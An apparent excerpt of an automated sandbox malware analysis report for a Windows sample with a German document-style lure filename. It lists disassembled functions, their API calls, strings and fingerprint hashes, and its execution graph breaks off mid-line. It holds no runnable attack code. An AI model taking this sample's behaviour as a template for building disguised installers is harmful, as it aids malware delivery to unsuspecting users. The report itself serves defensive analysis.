                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 4216380887-0
                                                            • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                            • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                            • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                            • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                            Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                            • String ID:
                                                            • API String ID: 1148316912-0
                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                            Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405BE9
                                                            • CharNextW.USER32(00000000), ref: 00405BEE
                                                            • CharNextW.USER32(00000000), ref: 00405C06
                                                            Strings
                                                            • fareafvrgende\Djrve27.gud, xrefs: 00405BDC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: fareafvrgende\Djrve27.gud
                                                            • API String ID: 3213498283-3469630132
                                                            • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                            • Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
                                                            • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                            • Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA
                                                            Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B52
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3355392842
                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                            • Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                            • Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD
                                                            Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                            • Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
                                                            • Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                            • Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC
                                                            Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                                            • CloseHandle.KERNEL32(?), ref: 0040587A
                                                            Strings
                                                            • Error launching installer, xrefs: 00405857
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                            • Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
                                                            • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                            • Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
                                                            Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75D53420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
                                                            • GlobalFree.KERNEL32(008FA308), ref: 004038F9
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 1100898210-3355392842
                                                            • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                            • Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
                                                            • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                            • Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
                                                            Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-3370423016
                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                            • Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                            • Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
                                                            Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                            Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
                                                            • CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                            • Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                            • Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

                                                            Execution Graph

                                                            Execution Coverage:2.6%
                                                            Dynamic/Decrypted Code Coverage:96.8%
                                                            Signature Coverage:1.5%
                                                            Total number of Nodes:1718
                                                            Total number of Limit Nodes:5
                                                            execution_graph 6824 36f73eb3 6827 36f75411 6824->6827 6828 36f7541d 6827->6828 6829 36f75af6 38 API calls 6828->6829 6832 36f75422 6829->6832 6830 36f755a8 38 API calls 6831 36f7544c 6830->6831 6832->6830 6871 36f79e71 6872 36f79e95 6871->6872 6873 36f79eae 6872->6873 6875 36f7ac6b 6872->6875 6876 36f79ef8 6873->6876 6879 36f7aa53 6873->6879 6878 36f7acad 6875->6878 6889 36f7b2f0 6875->6889 6880 36f7aa70 RtlDecodePointer 6879->6880 6882 36f7aa80 6879->6882 6880->6882 6881 36f72ada 5 API calls 6884 36f7ac67 6881->6884 6883 36f7ab0d 6882->6883 6885 36f7aab7 6882->6885 6886 36f7ab02 6882->6886 6883->6886 6887 36f76368 20 API calls 6883->6887 6884->6876 6885->6886 6888 36f76368 20 API calls 6885->6888 6886->6881 6887->6886 6888->6886 6890 36f7b329 6889->6890 6892 36f7b350 6890->6892 6900 36f7b5c1 6890->6900 6893 36f7b393 6892->6893 6894 36f7b36e 6892->6894 6913 36f7b8b2 6893->6913 6904 36f7b8e1 6894->6904 6897 36f7b38e 6898 36f72ada 5 API calls 6897->6898 6899 36f7b3b7 6898->6899 6899->6878 6901 36f7b5ec 6900->6901 6902 36f7b7e5 RaiseException 6901->6902 6903 36f7b7fd 6902->6903 6903->6892 6905 36f7b8f0 6904->6905 6906 36f7b90f 6905->6906 6907 36f7b964 6905->6907 6920 36f778a3 6906->6920 6909 36f7b8b2 20 API calls 6907->6909 6912 36f7b95d 6909->6912 6911 36f7b8b2 20 API calls 6911->6912 6912->6897 6914 36f7b8d4 6913->6914 6915 36f7b8bf 6913->6915 6917 36f76368 20 API calls 6914->6917 6916 36f7b8d9 6915->6916 6918 36f76368 20 API calls 6915->6918 6916->6897 6917->6916 6919 36f7b8cc 6918->6919 6919->6897 6921 36f778cb 6920->6921 6922 36f72ada 5 API calls 6921->6922 6923 36f778e8 6922->6923 6923->6911 6923->6912 6992 36f75630 6995 36f7563b 6992->6995 6993 36f75eb7 11 API calls 6993->6995 6994 36f75664 6998 36f75688 6994->6998 6995->6993 6995->6994 6996 36f75660 6995->6996 6999 36f75695 6998->6999 7001 36f756b4 6998->7001 7000 36f7569f RtlDeleteCriticalSection 6999->7000 7000->7000 7000->7001 7001->6996 7371 36f763f0 7372 36f76400 7371->7372 7375 36f76416 7371->7375 7373 36f76368 20 API calls 7372->7373 7374 36f76405 7373->7374 7377 36f762ac 26 API calls 7374->7377 7378 36f76480 7375->7378 7383 36f76561 7375->7383 7390 36f76580 7375->7390 7385 36f7640f 7377->7385 7401 36f74e76 7378->7401 7379 36f764e5 7381 36f764ee 7379->7381 7387 36f76573 7379->7387 7407 36f785eb 7379->7407 7382 36f7571e 20 API calls 7381->7382 7382->7383 7416 36f7679a 7383->7416 7388 36f762bc 11 API calls 7387->7388 7389 36f7657f 7388->7389 7391 36f7658c 7390->7391 7392 36f7637b 20 API calls 7391->7392 7393 36f765ba 7392->7393 7394 36f785eb 26 API calls 7393->7394 7395 36f765e6 7394->7395 7396 36f762bc 11 API calls 7395->7396 7397 36f76615 7396->7397 7398 36f766b6 FindFirstFileExA 7397->7398 7399 36f76705 7398->7399 7400 36f76580 26 API calls 7399->7400 7402 36f74e87 7401->7402 7403 36f74e8b 7401->7403 7402->7379 7403->7402 7404 36f7637b 20 API calls 7403->7404 7405 36f74eb9 7404->7405 7406 36f7571e 20 API calls 7405->7406 7406->7402 7409 36f7853a 7407->7409 7408 36f7854f 7410 36f76368 20 API calls 7408->7410 7411 36f78554 7408->7411 7409->7408 7409->7411 7414 36f7858b 7409->7414 7412 36f7857a 7410->7412 7411->7379 7413 36f762ac 26 API calls 7412->7413 7413->7411 7414->7411 7415 36f76368 20 API calls 